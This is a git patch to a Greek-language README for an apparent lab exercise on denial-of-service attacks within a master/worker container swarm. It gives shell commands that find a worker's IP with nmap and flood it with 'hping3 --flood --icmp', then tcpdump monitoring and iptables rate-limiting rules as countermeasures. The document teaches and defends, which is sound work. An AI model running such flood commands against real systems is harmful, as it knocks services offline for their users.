From f03a15d79750f7a4debe83a4ef73e6eae3133c67 Mon Sep 17 00:00:00 2001 From: AndreasNefeli Date: Sat, 23 Jan 2021 22:20:05 +0000 Subject: [PATCH] Update '1. DDos Attack/README.md' --- 1. DDos Attack/README.md | 62 ++++++++++++++++++++++++++++++++++------ 1 file changed, 53 insertions(+), 9 deletions(-) diff --git a/1. DDos Attack/README.md b/1. DDos Attack/README.md index 3c7607b..d602600 100644 --- a/1. DDos Attack/README.md +++ b/1. DDos Attack/README.md @@ -15,21 +15,65 @@ _____________________________________________________________ * Η μεταβλητή my_ip περιέχει την ip του master -**my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')** + **my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')** * Για να πάρουμε την ip του όλου του δικτύου, θα εμφωλεύσουμε στη μεταβλητή network το περιεχόμενο της my_ip, αλλά το τελευταίο ψηφίο, τώρα είναι *. -**network=$(echo $my_ip | sed 's/.[0-9]$/.*/')** + **network=$(echo $my_ip | sed 's/.[0-9]$/.*/')** -Στη μεταβλητή worker περιέχεται η ip του πρώτου worker, όπως αυτός υπάρχει στο σμήνος. Εάν θέλουμε να επιτεθούμε σε κάποιον άλλο worker, θα βάλουμε το επιθυμητό ψηφίο στην παράμετρο **grep worker_ψηφίο**. +* Στη μεταβλητή worker περιέχεται η ip του πρώτου worker, όπως αυτός υπάρχει στο σμήνος. Εάν θέλουμε να επιτεθούμε σε κάποιον άλλο worker, θα βάλουμε το επιθυμητό ψηφίο στην παράμετρο **grep worker_ψηφίο**. -**worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')** + **worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')** -Τώρα που έχουμε τις απαραίτητες πληροφορίες, μπορούμε να εκτελέσουμε την επίθεση. +* Τώρα που έχουμε τις απαραίτητες πληροφορίες, μπορούμε να εκτελέσουμε την επίθεση. -**sudo hping3 -p 80 --flood --icmp $worker** + **sudo hping3 -p 80 --flood --icmp $worker** +______________________________________________ + +Χρησιμοποιώντας τα εργαλεία tcdump, netstat, αλλά και iptables, παρατηρούμε μέτρα για την αντιμετώπιση της επίθεσης, τα οποία παίρνει ο εκάστοτε worker. + +Θα πρέπει να εγκαταστήσουμε τα εν λόγω εργαλεία: + +**sudo apt update + +sudo apt upgrade -y + +sudo apt install tcpdump -y + +sudo apt install iptables -y** + +Στη συνέχεια θα γράψουμε ένα νέο script **worker.sh**, το οποίο θα περιλαμβάνει τη χρήση των εργαλείων. + +* Όπως και στο master.sh, αποθηκεύουμε την ip του worker σε μία μεταβλητή. + + **my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}')** + +* Μέσω των iptables βλέπουμε τι συμβαίνει στο worker κατά την επίθεση. + + **sudo iptables -F** + +* Για 2" παρακολουθούμε μόνο τα replies του επιτιθέμενου προς τον master (που εκτελέι την DDos). Χρησιμοποιώντας το firewall, φιλτράρονται τα εισερχόμενα πακέτα ICMP και θα πρέπει τα incoming να είναι όσα και οι απαντήσεις του worker. + + **sudo timeout 2s tcpdump -i eth0 icmp and src $my_ip** + +* Ως αντίμετρο, ο worker επιτρέπει μόνο ένα ICMP πακέτο/1" + + **sudo iptables -N icmp_flood** + + **sudo iptables -A INPUT -p icmp -j icmp_flood** + + **sudo iptables -A icmp_flood -m limit --limit 1/s --limit-burst 3 -j RETURN** + + **sudo iptables -A icmp_flood -j DROP** + +* + **sudo timeout 5s tcpdump -i eth0 icmp and src $my_ip** + + + +______________________________________________________ +**References** +1. http://www.ijens.org/Vol_12_I_03/1210803-7474-IJET-IJENS.pdf +2. https://www.infosectrain.com/blog/dos-ddos-attacks/ -β. Χρησιμοποιήστε τα tcpdump, netstat εργαλεία για την εύρεση, -ανάλυση και παρουσίαση των συγκεκριμένων επιθέσεων. -γ. Δημιουργήστε iptables rules για την αντιμετώπιση των επιθέσεων.